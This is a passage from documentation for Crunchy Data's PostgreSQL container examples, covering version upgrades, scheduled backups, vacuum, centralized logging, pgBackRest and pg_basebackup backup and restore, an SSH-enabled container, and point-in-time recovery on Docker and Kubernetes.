to\n9.6 or from 9.6 to 10.\n\nPrior to running this example, make sure your `CCP_IMAGE_TAG`\nenvironment variable is using the next major version of PostgreSQL that you\nwant to upgrade to. For example, if you're upgrading from 9.5 to 9.6, make\nsure the variable references a PG 9.6 image such as `centos7-9.6.10-2.2.0`.\n\nThis will create the following in your Kubernetes environment:\n\n * a Kubernetes Job running the *crunchy-upgrade* container\n * a new data directory name *upgrade* found in the *pgnewdata* PVC\n\n{{% notice tip %}}\nData checksums on the Crunchy PostgreSQL container were enabled by default in version 2.1.0.\nWhen trying to upgrade, it's required that both the old database and the new database\nhave the same data checksums setting. Prior to upgrade, check if `data_checksums`\nwere enabled on the database by running the following SQL: `SHOW data_checksums`\n{{% \/notice %}}\n\n==== Kubernetes and OpenShift\n\n{{% notice tip %}}\nBefore running the example, ensure you edit `upgrade.json` and update the `OLD_VERSION`\nand `NEW_VERSION` parameters to the ones relevant to your situation.\n{{% \/notice %}}\n\nStart the upgrade as follows:\n....\ncd $CCPROOT\/examples\/kube\/upgrade\n.\/run.sh\n....\n\nIf successful, the Job will end with a **successful** status. Verify\nthe results of the Job by examining the Job's pod log:\n....\n${CCP_CLI} get pod -l job-name=upgrade\n${CCP_CLI} logs -l job-name=upgrade\n....\n\nYou can verify the upgraded database by running the `post-upgrade.sh` script in the\n`examples\/kube\/upgrade` directory. This will create a PostgreSQL pod that mounts the\nupgraded volume.\n\n=== Crunchy Scheduler\n\nThe Crunchy Scheduler container implements a cronlike microservice within a namespace\nto automate backups of a PostgreSQL database.\n\nCurrently Crunchy Scheduler only supports two types of tasks:\n\n* pgBackRest\n* pgBaseBackup\n\nThis service watches Kubernetes for config maps with the label `crunchy-scheduler=true`.\nIf found the scheduler will parse the data found in the config map (json object) and\nconvert it to a scheduled task. If the config map is removed, the scheduler will\ndelete the task.\n\nSee the following examples for creating config maps that Crunchy Scheduler can parse:\n\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-backrest-diff.json[pgBackRest Diff Backup]\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-backrest-full.json[pgBackRest Full Backup]\n* link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/configs\/schedule-pgbasebackup.json[pgBaseBackup Backup]\n\nThe Crunchy Scheduler requires a Service Account to create jobs (pgBaseBackup) and to\nexec (pgBackRest). See the link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/scheduler-sa.json[scheduler example]\nfor the required permissions on this account.\n\n==== pgBackRest Schedules\n\nTo configure Crunchy Scheduler to create pgBackRest backups the following is required:\n\n* pgBackRest schedule definition requires a deployment name. The PostgreSQL pod should be created by a deployment.\n\n==== pgBaseBackup Schedules\n\nTo configure Crunchy Scheduler to create pgBaseBackup scheduled backups, the following is required:\n\n* The name of the secret that contains the username and password the Scheduler will use to\n configure the job template. See link:https:\/\/github.com\/CrunchyData\/crunchy-containers\/blob\/scheduler\/examples\/kube\/scheduler\/primary\/secret.json[the primary secret example].\n for the structure required by the Scheduler.\n* The name of the PVC created for the backups. This should be created by the user prior to scheduling the task.\n\n==== Kubernetes and OpenShift\n\nFirst, start the PostgreSQL example created for the Scheduler by running the following commands:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\/primary\n.\/run.sh\n....\n\nThe pod created should show a ready status before proceeding.\n\nNext, start the scheduler by running the following command:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\n.\/run.sh\n....\n\nOnce the scheduler is deployed, register the backup tasks by running the following command:\n\n....\n# Kubernetes\ncd $CCPROOT\/examples\/kube\/scheduler\n.\/add-schedules.sh\n....\n\nThe scheduled tasks will (these are just for fast results, not recommended for production):\n\n* take a backup every minute using pgBaseBackup\n* take a full pgBackRest backup every even minute\n* take a diff pgBackRest backup every odd minute\n\nView the logs for the `scheduler` pod until the tasks run:\n\n....\n${CCP_CLI?} logs scheduler -f\n....\n\nView the `pgBaseBackup` pods results after the backup completes:\n\n....\n${CCP_CLI?} logs <basebackup pod name>\n....\n\nView the `pgBackRest` backups via exec after the backup completes:\n\n....\n${CCP_CLI?} exec -ti <primary deployment pod name> -- pgbackrest info\n....\n\nClean up the examples by running the following commands:\n\n....\n$CCPROOT\/examples\/kube\/scheduler\/primary\/cleanup.sh\n$CCPROOT\/examples\/kube\/scheduler\/cleanup.sh\n....\n\n=== Vacuum\n\nYou can perform a PostgreSQL vacuum command by running the crunchy-vacuum\ncontainer. You specify a database to vacuum using environment variables. By default,\nvacuum is executed against the *primary* example container.\n\nThe crunchy-vacuum container image exists to allow a DBA a way to run a job either\nindividually or scheduled to perform a variety of vacuum operations.\n\nThis example performs a vacuum on a single table in the primary PostgreSQL\ndatabase. The crunchy-vacuum image is executed with the PostgreSQL connection\nparameters to the single-primary PostgreSQL container. The type of vacuum performed is\ndictated by the environment variables passed into the job; these are defined with further detail\nlink:\/container-specifications\/crunchy-vacuum[here].\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/vacuum\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/vacuum\/\n.\/run.sh\n....\n\nVerify the job is completed:\n....\n${CCP_CLI} get job\n....\n\n=== systemd\n\nThe crunchy-pg.service is an example of a systemd unit file\nthat starts and stops a container named crunchy-pg that\nhas already been created.\n\nThe example scripts are located in the following directory:\n....\n$CCPROOT\/examples\/systemd\/\n....\n\nThere are two scripts within the directory.\n\n....\ntest-start.sh\n....\n\nThis script is called by the systemd start execution. The trick\nwith this script is that it blocks forever after starting the\ndocker crunchy-pg container. The blocking in the script\nkeeps systemd happy and thinking that this is a normal daemon.\n\n....\ntest-stop.sh\n....\n\nThis script stops the test-start.sh script and also stops the\ncrunchy-pg Docker container.\n\n=== Centralized Logging\n\nThe logs generated by containers are critical for deployments because they provide insights into the\nhealth of the system. PostgreSQL logs are very detailed and there is some information that can only be\nobtained from logs (but not limited to):\n\n* Connections and Disconnections of users\n* Checkpoint Statistics\n* PostgreSQL Server Errors\n\nAggregrating container logs across multiple hosts allows administrators to audit, debug problems and prevent\nrepudiation of misconduct.\n\nIn the following example we will demonstrate how to setup Kubernetes and OpenShift to use centralized logging by using\nan EFK (Elasticsearch, Fluentd and Kibana) stack. Fluentd will run as a daemonset on each host within the Kubernetes\ncluster and extract container logs, Elasticsearch will consume and index the logs gathered by Fluentd and Kibana will allow\nusers to explore and visualize the logs via a web dashboard.\n\nTo learn more about the EFK stack, see the following:\n\n* https:\/\/www.elastic.co\/products\/elasticsearch\n* https:\/\/www.fluentd.org\/architecture\n* https:\/\/www.elastic.co\/products\/kibana\n\n==== Configure PostgreSQL for Centralized Logging\n\nBy default, Crunchy PostgreSQL logs to files in the `\/pgdata` directory. In order to get the logs\nout of the container we need to configure PostgreSQL to log to `stdout`.\n\nThe following settings should be configured in `postgresql.conf` to make PostgreSQL log to `stdout`:\n\n```\nlog_destination = 'stderr'\nlogging_collector = off\n```\n\n{{% notice warning %}}\nChanges to logging settings require a restart of the PostgreSQL container to take effect.\n{{% \/notice %}}\n\n==== Deploying the EFK Stack On OpenShift Container Platform\n\nOpenShift Container Platform can be installed with an EFK stack. For more information about\nconfiguring OpenShift to create an EFK stack, see the official documentation:\n\n* https:\/\/docs.openshift.com\/container-platform\/3.10\/install_config\/aggregate_logging.html\n\n==== Deploying the EFK Stack On Kubernetes\n\nFirst, deploy the EFK stack by running the example using the following commands:\n\n....\ncd $CCPROOT\/examples\/kube\/centralized-logging\/efk\n.\/run.sh\n....\n\n{{% notice warning %}}\nElasticsearch is configured to use an `emptyDir` volume in this example. Configure this example to provide a\npersistent volume when deploying into production.\n{{% \/notice %}}\n\n\nNext, verify the pods are running in the `kube-system` namespace:\n\n```\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=elasticsearch-logging\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=fluentd-es\n${CCP_CLI?} get pods -n kube-system --selector=k8s-app=kibana-logging\n```\n\nIf all pods deployed successfully elasticsearch should already be receiving container logs from Fluentd.\n\nNext we will deploy a PostgreSQL Cluster (primary and replica deployments) to demonstrate PostgreSQL logs\nare being captured by Fluentd.\n\nDeploy the PostgreSQL cluster by running the following:\n\n....\ncd $CCPROOT\/examples\/kube\/centralized-logging\/postgres-cluster\n.\/run.sh\n....\n\nNext, verify the pods are running:\n\n....\n${CCP_CLI?} get pods --selector=k8s-app=postgres-cluster\n....\n\nWith the PostgreSQL successfully deployed, we can now query the logs in Kibana.\n\nWe will need to setup a port-forward to the Kibana pod to access it. To do that\nwe first get the name of the pod by running the following command:\n\n....\n${CCP_CLI?} get pod --selector=k8s-app=kibana-logging -n kube-system\n....\n\nNext, start the port-forward:\n\n....\n${CCP_CLI?} port-forward <KIBANA POD NAME> 5601:5601 -n kube-system\n....\n\nTo access the web dashboard navigate in a browser to `127.0.0.1:5601`.\n\nFirst, click the `Discover` tab and setup an index pattern to use for queries.\n\nThe index pattern name we will use is `logstash-*` because Fluentd is configured to\ngenerate logstash style logs.\n\nNext we will configure the `Time Filter field name` to be `@timestamp`.\n\nNow that our index pattern is created, we can query for the container logs.\n\nClick the `Discover` tab and use the following queries:\n\n....\n# KUBERNETES\nCONTAINER_NAME: *primary* AND MESSAGE: \".*LOG*\"\n# OpenShift\nkubernetes.pod_name: \"primary\" AND log\n....\n\nFor more information about querying Kibana, see the official documentation: https:\/\/www.elastic.co\/guide\/en\/beats\/packetbeat\/current\/kibana-queries-filters.html\n\n== Backup and Restoration\n\n=== pg_dump\n\nThe script assumes you are going to backup the *primary* example and that container\nis running.\n\nThis example assumes you have configured a storage filesystem as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration] document.\n\nA successful backup will perform pg_dump\/pg_dumpall on the primary and store\nthe resulting files in the mounted volume under a directory named `<HOSTNAME>-backups`\nas a sub-directory, then followed by a unique backup directory based upon a\ndate and timestamp - allowing any number of backups to be kept.\n\nFor more information on how to configure this container, please see the link:\/container-specifications\/[Container Specifications] document.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the backup with this command:\n....\ncd $CCPROOT\/examples\/docker\/pgdump\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgdump\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nThe `pgdump.json` file within that directory specifies options that control the behavior of the pgdump job.\nExamples of this include whether to run pg_dump vs pg_dumpall and advanced options for specific backup use cases.\n\n=== pg_restore\n\nThe script assumes you are going to restore to the *primary* example and that container\nis running and a backup has been created using the `pgdump` example..\n\nThis example assumes you have configured a storage filesystem as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration] document.\n\nSuccessful use of the `crunchy-pgrestore` container will run a job to restore files generated by\npg_dump\/pg_dumpall to a container via psql\/pg_restore; then container will terminate successfully\nand signal job completion.\n\nFor more information on how to configure this container, please see the link:\/container-specifications\/[Container Specifications] document.\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the restore with this command:\n....\ncd $CCPROOT\/examples\/docker\/pgrestore\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nBy default, pgrestore container will automatically restore from the most recent backup.\nIf you want to restore to a specific backup, edit the `pgrestore.json` file and update the\n`PGRESTORE_BACKUP_TIMESTAMP` setting to specify the backup path you want to restore with. For example:\n....\n\"name\":\"PGRESTORE_BACKUP_TIMESTAMP\",\n\"value\":\"2018-03-27-14-35-33\"\n....\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/pgrestore\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nThe `pgrestore.json` file within that directory specifies options that control the behavior of the pgrestore job.\n\n=== pgBackRest\n\npgbackrest is a utility that performs a backup, restore, and archive\nfunction for a PostgreSQL database. pgbackrest is written and\nmaintained by David Steele, and more information can be found on the\nlink:http:\/\/www.pgbackrest.org\/[official website].\n\nBackups are currently performed by manually executing pgbackrest commands against the desired pod.\nRestores can now be performed via the crunchy-backrest-restore container, which offers FULL or\nDELTA restore capability.\n\npgbackrest is configured using a `pgbackrest.conf` file that is\nmounted into the crunchy-postgres container at `\/pgconf`.\n\nIf you place a `pgbackrest.conf` file within this mounted directory, it\nwill trigger the use of pgbackrest within the PostgreSQL container\nas the `archive_command` and will turn on the `archive_mode` to begin\narchival. It is still required to define the `ARCHIVE_TIMEOUT` environment\nvariable within your container configuration as it is set to\na disable value of 0 by default.\n\nThe following changes will be made to the container's `postgresql.conf`\nfile:\n....\nARCHIVE_MODE=on\nARCHIVE_TIMEOUT=60\nARCHIVE_COMMAND='pgbackrest --stanza=db archive-push %p'\n....\n\nIf you are using a crunchy-postgres image older than 1.7.1, `archive_command` must specify where\nthe `pgbackrest.conf` file is located:\n....\nARCHIVE_COMMAND='pgbackrest --config=\/pgconf\/pgbackrest.conf --stanza=db archive-push %p'\n....\n\n{{% notice warning %}}\nThis requires you use a pgbackrest stanza name of *db* within the\n`pgbackrest.conf` file you mount.\n{{% \/notice %}}\n\nWhen set, WAL files generated by the database will be written\nout to the `\/backrestrepo\/HOSTNAME-backups` mount point.\n\nAdditionally, the Crunchy Postgres container can templatize `pgbackrest.conf` files\nby searching for the HOSTNAME values in a mounted `pgbackrest.conf` file.\n\nFor example, `db-path=\/pgdata\/HOSTNAME` will render to `db-path=\/pgdata\/primary` if\nthe container's hostname is primary. HOSTNAME will be replaced with the value of\n`PGDATA_PATH_OVERRIDE` when working with deployments\/replicasets.\n\n{{% notice warning %}}\nThe templating example above works for `db-path` settings, however, `repo-path` should\nfollow the convention `repo-path=\/backrestrepo\/HOSTNAME-backups` in cases where\nvolumes are being mounted to a single mount point (such as hostPath or NFS). Without\nthe additional `-backups` the backups will populate in the `pgdata` directory.\n{{% \/notice %}}\n\n==== Kubernetes and OpenShift\n\n===== Backup\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/backup\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * PostgreSQL pod with pgBackRest configured\n * PostgreSQL service\n * PVC for the PGDATA directory\n * PVC for the BackRest Backups and Archives directory\n\nExamine the `\/backrestrepo` location to view the archive directory and ensure WAL archiving is working.\n\nYou can create a backup using backrest using this command within the container:\n....\n${CCP_CLI} exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup --type=full\n....\n\n===== Async Archiving\n\npgBackRest supports asyncronous archiving to pull and push Write Ahead Logs.\nAsynchronous operation is more efficient because it can reuse connections and take\nadvantage of parallelism. For more information on async archiving, see the pgBackRest\nlink:https:\/\/pgbackrest.org\/user-guide.html#async-archiving[official documentation].\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * PostgreSQL pod with pgBackRest configured and archiving asynchronously.\n * PostgreSQL service\n * PVC for the PGDATA directory\n * PVC for the BackRest Backups and Archives directory\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/async-archiving\n.\/run.sh\n....\n\nExamine the `\/backrestrepo\/HOSTNAME-backups` location to view the archive directory\nand ensure WAL archiving is working.\n\nExamine the `\/pgdata\/HOSTNAME-spool` location to view the transient directory\nused for async archiving.\n\nYou can create a backup using backrest using this command within the container:\n....\n${CCP_CLI} exec -it backrest-async-archive \/bin\/bash\npgbackrest --stanza=db backup\n....\n\n{{% notice warning %}}\nA spooling directory is automatically created in both `\/pgdata` and `\/pgwal`. It is\nadvised to configure pgBackRest to use the spooling location closest to the Write Ahead Log.\n\nIf the PostgreSQL container was created using the `XLOGDIR` variable, the `\/pgwal\/HOSTNAME-spool`\ndirectory should be configured in `pgbackrest.conf` as such: `spool-path=\/pgwal\/HOSTNAME-spool`.\nIf WAL resides on PGDATA, use: `spool-path=\/pgdata\/HOSTNAME-spool`\n{{% \/notice %}}\n\n==== Restore\n\nThere are three options to choose from when performing a restore:\n\n * Delta - only restore missing files from PGDATA\n * Full - restore all files, pgdata must be empty\n * Point in Time Recovery (PITR) - delta restore to a certain point in time\n\n===== PITR\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It should be left running and a\npgBackRest backup has been created.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/pitr\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for PITR restore\n\npgBackRest will restore the `pgdata` volume mounted to the restore container\nto the point in time specified by the `PITR_TARGET` environment variable. To get\na compliant timestamp, PostgreSQL can be queried using the following SQL:\n\n....\npsql -U postgres -Atc 'select current_timestamp'\n....\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/pitr\n.\/post-restore.sh\n....\n\n===== Full\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/full\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for full restore\n * New PVC for the PGDATA directory (full restores require PGDATA to be empty)\n\npgBackRest will restore all files to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/full\n.\/post-restore.sh\n....\n\n===== Delta\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * configMap containing `pgbackrest.conf`\n * Backrest-Restore pod with pgBackRest configured for full restore\n\npgBackRest will restore files missing to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/post-restore.sh\n....\n\n==== Docker\n\n===== Backup\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/backup\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * PostgreSQL container with pgBackRest configured\n * Volume for the PGDATA directory\n * Volume for the `pgbackrest.conf` configuration\n * Volume for the BackRest Backups and Archives directory\n\nExamine the `\/backrestrepo` location to view the archive directory and ensure WAL archiving is working.\n\nYou can create a backup using backrest using this command within the container:\n....\ndocker exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup --type=full\n....\n\n===== Async Archiving\n\nThis will create the following in your Docker environment:\n\n * PostgreSQL container with pgBackRest configured\n * Volume for the PGDATA directory\n * Volume for the `pgbackrest.conf` configuration\n * Volume for the BackRest Backups and Archives directory\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/async-archiving\n.\/run.sh\n....\n\nExamine the `\/backrestrepo\/HOSTNAME-backups` location to view the archive directory\nand ensure WAL archiving is working.\n\nExamine the `\/pgdata\/HOSTNAME-spool` location to view the transient directory\nused for async archiving.\n\nYou can create a backup using backrest using this command within the container:\n....\ndocker exec -it backrest \/bin\/bash\npgbackrest --stanza=db backup\n....\n\n{{% notice warning %}}\nA spooling directory is automatically created in both `\/pgdata` and `\/pgwal`. It is\nadvised to configure pgBackRest to use the spooling location closest to the Write Ahead Log.\n\nIf the PostgreSQL container was created using the `XLOGDIR` variable, the `\/pgwal\/HOSTNAME-spool`\ndirectory should be configured in `pgbackrest.conf` as such: `spool-path=\/pgwal\/HOSTNAME-spool`.\nIf WAL resides on PGDATA, use: `spool-path=\/pgdata\/HOSTNAME-spool`\n{{% \/notice %}}\n\n==== Restore\n\n===== PITR\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It should be left running and a\npgBackRest backup has been created.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/pitr\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore container with pgBackRest configured for PITR restore\n\npgBackRest will restore the `pgdata` volume mounted to the restore container\nto the point in time specified by the `PITR_TARGET` environment variable. To get\na compliant timestamp, PostgreSQL can be queried using the following SQL:\n\n....\npsql -U postgres -Atc 'select current_timestamp'\n....\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/docker\/backrest\/pitr\n.\/post-restore.sh\n....\n\n===== Full\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/docker\/backrest\/full\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore pod with pgBackRest configured for full restore\n * New Volume for the PGDATA directory (full restores require PGDATA to be empty)\n\npgBackRest will restore all files to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/docker\/backrest\/full\n.\/post-restore.sh\n....\n\n===== Delta\n\n{{% notice tip %}}\nThis example uses the `backrest\/backup` example. It does not need to be running but a\npgBackRest backup is required.\n{{% \/notice %}}\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * Backrest-Restore pod with pgBackRest configured for full restore\n\npgBackRest will restore files missing to the `pgdata` volume mounted to the restore container.\n\nAfter a successful restore, run the following to start the restored PostgreSQL container:\n\n....\ncd $CCPROOT\/examples\/kube\/backrest\/delta\n.\/post-restore.sh\n....\n\n=== pgBackRest with SSHD\n\nThe PostgreSQL and PostgreSQL GIS containers can enable an SSH daemon to allow developers\nto do DBA tasks on the database server without the need for exec privileges. An administrator\nwho deploys the SSHD enabled PostgreSQL database can specify the authorized public keys for\naccess to the database server.\n\nIn order to activate SSHD in the PostgreSQL containers, the following files need to be\nmounted to the PostgreSQL container:\n\n- SSH Host keys mounted on the \/sshd volume. Three keys are required:\n\n * ssh_host_rsa_key\n * ssh_host_ecdsa_key\n * ssh_host_ed25519_key\n\n- sshd_config mounted on the \/pgconf volume\n- authorized_keys mounted on the \/pgconf volume\n\nSSHD can be enabled in the PostgreSQL containers by adding the following line:\n....\nENABLE_SSHD=true\n....\n\nThe *authorized_keys* file is mounted on the *\/pgconf* directory. In order to support\nusing this mount for authentication the following must be set in *sshd_config*:\n....\nAuthorizedKeysFile \/pgconf\/authorized_keys\nStrictModes no\n....\n\nFor OpenShift deployments, the following configuration needs to be set in *sshd_config*:\n....\nUsePAM no\n....\n\n==== Docker\n\nStart the example as follows:\n\n....\ncd $CCPROOT\/examples\/docker\/postgres-sshd\n.\/run.sh\n....\n\nThis will create the following in your Docker environment:\n\n * A volume named pgconf which contains the pgbackrest.conf, pg_hba.conf, postgresql.conf, sshd_config, authorized_keys file\n * A volume named sshd containing the SSH Host keys\n * postgres-sshd container pgbackrest archive and sshd enabled. An initial stanza db will be created on initialization\n\nAfter running the example, SSH to the container using the forwarded port 2022:\n\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@0.0.0.0\n....\n\n==== Kubernetes \/ OpenShift\n\nStart the example as follows:\n....\ncd $CCPROOT\/examples\/kube\/postgres-sshd\n.\/run.sh\n....\n\nThis will create the following in your Kubernetes environment:\n\n * A configMap named pgconf which contains the pgbackrest.conf, pg_hba.conf, postgresql.conf, sshd_config, authorized_keys file\n * A secret named sshd-secrets containing the SSH Host keys\n * postgres-sshd pod with pgbackrest archive and sshd enabled. An initial stanza db will be created on initialization\n * postgres-sshd service with port 2022 for SSH\n\nAfter running the example, SSH to the service using the postgres-sshd service available in Kubernetes:\n\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd\n....\n\n==== Using pgBackrest via SSH\n\nIf a pgbackrest.conf file is located on the \/pgconf volume and archiving is enabled, it's possible to\nrun backups using the pgBackrest utility.\n\nWith the SSHD service running, the following command will issue a pgBackrest backup.\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd pgbackrest --stanza=db backup\n....\n\nTo list all the available pgBackrest backups, run the following:\n....\nssh -i .\/keys\/id_rsa -p 2022 postgres@postgres-sshd pgbackrest info\n....\n\n=== pg_basebackup\n\nThe script assumes you are going to backup the *primary*\ncontainer created in the first example, so you need to ensure\nthat container is running. This example assumes you have configured storage as described\nin the link:\/installation\/storage-configuration\/[Storage Configuration documentation]. Things to point out with this example\ninclude its use of persistent volumes and volume claims to store the backup data files.\n\nA successful backup will perform `pg_basebackup` on the *primary* container and store\nthe backup in the `$CCP_STORAGE_PATH` volume under a directory named `primary-backups`. Each\nbackup will be stored in a subdirectory with a timestamp as the name, allowing any number of backups to be kept.\n\nThe backup script will do the following:\n\n* Start up a backup container named backup\n* Run `pg_basebackup` on the container named *primary*\n* Store the backup in the `\/tmp\/backups\/primary-backups` directory\n* Exit after the backup\n\nWhen you are ready to restore from the backup, the restore example runs a PostgreSQL container\nusing the backup location. Upon initialization, the container will use rsync to copy the backup\ndata to this new container and then launch PostgreSQL using the original backed-up data.\n\nThe restore script will do the following:\n\n* Start up a container named *restore*\n* Copy the backup files from the previous backup example into `\/pgdata`\n* Start up the container using the backup files\n* Map the PostgreSQL port of 5432 in the container to your local host port of 12001\n\nTo shutdown the instance and remove the container for each example, run the following:\n....\n.\/cleanup.sh\n....\n\n==== Docker\n\nRun the backup with this command:\n....\ncd $CCPROOT\/examples\/docker\/backup\n.\/run.sh\n....\n\nWhen you're ready to restore, a *restore* example is provided.\n\nIt's required to specified a backup path for this example. To get the correct path\ncheck the `backup` job logs or a timestamp:\n\n....\ndocker logs backup-vpk9l | grep BACKUP_PATH\nWed May 9 20:32:00 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/primary-backups\/2018-05-09-20-32-00.\n....\n\nBACKUP_PATH can also be discovered by looking at the backup mount directly (if access\nto the storage is available to the user).\n\nAn example of BACKUP_PATH is as followed:\n....\n\"name\": \"BACKUP_PATH\",\n\"value\": \"primary-backups\/2018-05-09-20-32-00\"\n....\n\nWhen you are ready to restore from the backup created, run the following example:\n....\ncd $CCPROOT\/examples\/docker\/restore\n.\/run.sh\n....\n\n==== Kubernetes and OpenShift\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/backup\n.\/run.sh\n....\n\nThe Kubernetes Job type executes a pod and then the pod exits. You can\nview the Job status using this command:\n....\n${CCP_CLI} get job\n....\n\nWhen you're ready to restore, a *restore* example is provided.\n\nIt's required to specified a backup path for this example. To get the correct path\ncheck the `backup` job logs or a timestamp:\n....\nkubectl logs backup-vpk9l | grep BACKUP_PATH\nWed May 9 20:32:00 UTC 2018 INFO: BACKUP_PATH is set to \/pgdata\/primary-backups\/2018-05-09-20-32-00.\n....\n\nBACKUP_PATH can also be discovered by looking at the backup mount directly (if access\nto the storage is available to the user).\n\nAn example of BACKUP_PATH defined as a variable within the JSON script is as follows:\n....\n\"name\": \"BACKUP_PATH\",\n\"value\": \"primary-backups\/2018-05-09-20-32-00\"\n....\n\nRunning the example:\n....\ncd $CCPROOT\/examples\/kube\/restore\n.\/run.sh\n....\n\nTest the restored database as follows:\n....\npsql -h restore -U postgres postgres\n....\n\n=== Point in Time Recovery (PITR)\n\nPITR (point-in-time-recovery) is a feature that allows for recreating a database\nfrom backup and log files at a certain point in time. This is done using a write\nahead log (WAL) which is kept in the `pg_wal` directory within `PGDATA`. Changes\nmade to the database files over time are recorded in these log files, which allows\nit to be used for disaster recovery purposes.\n\nWhen using PITR as a backup method, in order to restore from the last checkpoint in\nthe event of a database or system failure, it is only necessary to save these log\nfiles plus a full backup. This provides an additional advantage in that it is not\nnecessary to keep multiple full backups on hand, which consume space and time to create.\nThis is because point in time recovery allows you to \"replay\" the log files and recover\nyour database to any point since the last full backup.\n\nMore detailed information about Write Ahead Log (WAL) archiving can be found\nlink:https:\/\/www.postgresql.org\/docs\/10\/static\/continuous-archiving.html[here.]\n\nBy default in the crunchy-postgres container, WAL logging is *not* enabled.\nTo enable WAL logging *outside of this example*, set the following environment\nvariables when starting the crunchy-postgres container:\n....\nARCHIVE_MODE=on\nARCHIVE_TIMEOUT=60\n....\n\nThese variables set the same name settings within the `postgresql.conf`\nfile that is used by the database. When set, WAL files generated by the database\nwill be written out to the `\/pgwal` mount point.\n\nA full backup is required to do a PITR. crunchy-backup currently\nperforms this role within the example, running a `pg_basebackup` on the database.\nThis is a requirement for PITR. After a backup is performed, code is added into\ncrunchy-postgres which will also check to see if you want to do a PITR.\n\nThere are three volume mounts used with the PITR example.\n\n* `\/recover` - When specified within a crunchy-postgres container, PITR is activated during container startup.\n* `\/backup` - This is used to find the base backup you want to recover from.\n* `\/pgwal` - This volume is used to write out new WAL files from the newly restored database container.\n\nSome environment variables used to manipulate the point in time recovery logic:\n\n* The `RECOVERY_TARGET_NAME` environment variable is used to tell the PITR logic what the name of the target is.\n* `RECOVERY_TARGET_TIME` is also an optional environment variable that restores using a known time stamp.\n\nIf you don't specify either of 